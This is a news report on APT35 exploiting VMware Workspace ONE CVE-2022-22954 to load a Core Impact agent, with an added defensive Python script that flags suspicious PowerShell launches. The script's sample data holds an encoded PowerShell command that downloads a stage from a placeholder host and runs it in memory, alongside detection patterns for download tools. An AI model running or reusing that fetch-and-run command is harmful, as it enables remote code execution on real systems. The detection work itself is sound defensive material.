Advanced hackers are actively exploiting a critical remote code execution (RCE) vulnerability, CVE-2022-22954, affecting VMware Workspace ONE Access (formerly called VMware Identity Manager).
The issue was fixed in a security update 20 days ago, along with two more RCEs, CVE-2022-22957 and CVE-2022-22958, which also affect VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation and vRealize Suite Lifecycle Manager.
Shortly after the public disclosure of the flaws, proof-of-concept (PoC) exploit code emerged in the public domain, allowing hackers to take advantage of vulnerable implementations of VMware products. VMware confirmed the exploitation of CVE-2022-22954 in the wild.
Now, Morphisec researchers report seeing exploitation by advanced persistent threat (APT) actors, in particular by an Iranian hacking group tracked as APT35, also known as “Rocket Kitten.”
Adversaries gain initial access to the environment by exploiting CVE-2022-22954, the only one in the trio of RCEs that does not require administrative access to the target server and also has a publicly available PoC exploit.
The attack begins with a PowerShell command executed on the vulnerable service (Identity Manager), which launches the first stage of the chain.
The host then fetches the heavily obfuscated PowerTrash loader from the command and control (C2) server, and the loader places a Core Impact agent in system memory.
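The chain described above has a detection-friendly shape: a web-facing identity service spawning PowerShell, an encoded or obfuscated command line, a download from an external host, and an in-memory load rather than a file on disk. The script below is an added example (not code from the article or from Morphisec) that triages process-creation events for that shape. Everything in it is an assumption or constructed for illustration: the event field names, the list of service parent processes (the Identity Manager service is represented by a stand-in parent named `java`), the decoded sample command, and the 203.0.113.10 address.

```python
"""Triage process-creation events for PowerShell launched from a service
process with download and in-memory-load indicators.

Added example; event layout, parent-process list and sample values are
constructed and do not come from the Morphisec report."""
import base64
import re

# Parent images that should essentially never spawn a shell on an identity
# appliance. Hypothetical list: tune it to the environment being monitored.
SERVICE_PARENTS = {"java", "tomcat", "httpd", "nginx", "w3wp.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "powershell", "pwsh", "pwsh.exe"}

# Command-line indicators typical of a staged, in-memory loader.
LOADER_PATTERNS = {
    "download": re.compile(
        r"(DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Net\.WebClient|\bcurl\b|\bwget\b)",
        re.I),
    "in_memory_load": re.compile(
        r"(Reflection\.Assembly\]::Load|Invoke-Expression|\bIEX\b)", re.I),
    "encoded": re.compile(
        r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}", re.I),
    "quiet_flags": re.compile(
        r"-(w|windowstyle)\s+hidden|-nop\b|-noprofile\b", re.I),
}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    image = event["image"].rsplit("/", 1)[-1].rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL_IMAGES:
        return 0, []
    reasons = []
    parent = event.get("parent", "").lower()
    if parent in SERVICE_PARENTS:
        reasons.append(f"powershell spawned by service process {parent}")
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded:
        reasons.append("encoded command decoded for inspection")
        text = text + " " + decoded  # scan the plaintext as well
    for name, pattern in LOADER_PATTERNS.items():
        if pattern.search(text):
            reasons.append(f"indicator: {name}")
    return len(reasons), reasons


def triage(events, threshold=2):
    """Return events whose indicator count reaches the threshold."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append({"host": event["host"], "score": score, "reasons": reasons})
    return hits


def _encode(command):
    """Build a -EncodedCommand payload the way PowerShell expects it (UTF-16LE)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed events. The first mirrors the chain in the article: the service
# process spawns PowerShell, which pulls a stage from a C2 host into memory.
SAMPLE_EVENTS = [
    {"host": "idm-01", "parent": "java", "image": "/usr/bin/pwsh",
     "cmdline": "pwsh -nop -w hidden -enc " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage')")},
    {"host": "admin-ws", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    {"host": "idm-01", "parent": "java", "image": "/bin/sh",
     "cmdline": "sh -c ls"},
    {"host": "idm-02", "parent": "java", "image": "/usr/bin/pwsh",
     "cmdline": "pwsh -File /opt/scripts/rotate-logs.ps1"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["score"], "; ".join(hit["reasons"]))
```

The scoring deliberately treats a service process spawning PowerShell as one indicator among several, so a maintenance script launched by the same parent (the last sample event) stays below the threshold; on an appliance where no such scripts exist, that single indicator alone is worth an alert, and the threshold should be lowered accordingly. Decoding the encoded command before pattern matching is what turns an opaque base64 blob into the download and in-memory-load hits.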
Core Impact is a legitimate penetration testing tool that is abused for nefarious purposes in this case, similar to how Cobalt Strike is abused in malicious campaigns.
This is not new, however: Trend Micro has previously reported APT35 abusing Core Impact, with activity dating back to 2015.
Morphisec CTO Michael Gorelik told BleepingComputer that the attacker attempted to move laterally across the network, although the backdoor was stopped.
“With privileged access, these types of attacks can bypass typical defenses, including antivirus (AV) and endpoint detection and response (EDR),” Morphisec adds in the report.
Links to hosting company
Morphisec was able to retrieve the C2 address of the stage server, the version of the Core Impact client, and the 256-bit encryption key used for C2 communication, ultimately linking the operation to a specific person named Ivan Neculiti.
There’s an entry in the ‘Hucksters’ fraud exposure database by that name, which lists corporate entities registered in Moldova, Russia, and the UK, including a hosting company that the database says supports all sorts of illegal websites, as well as spam and phishing campaigns.
It is unclear whether Neculiti or associated companies were in any way involved, knowingly or unknowingly, in cybercriminal campaigns.
BleepingComputer has contacted both hosting companies for comment on the allegations made in the Morphisec report, and we’ll update this post if we hear back.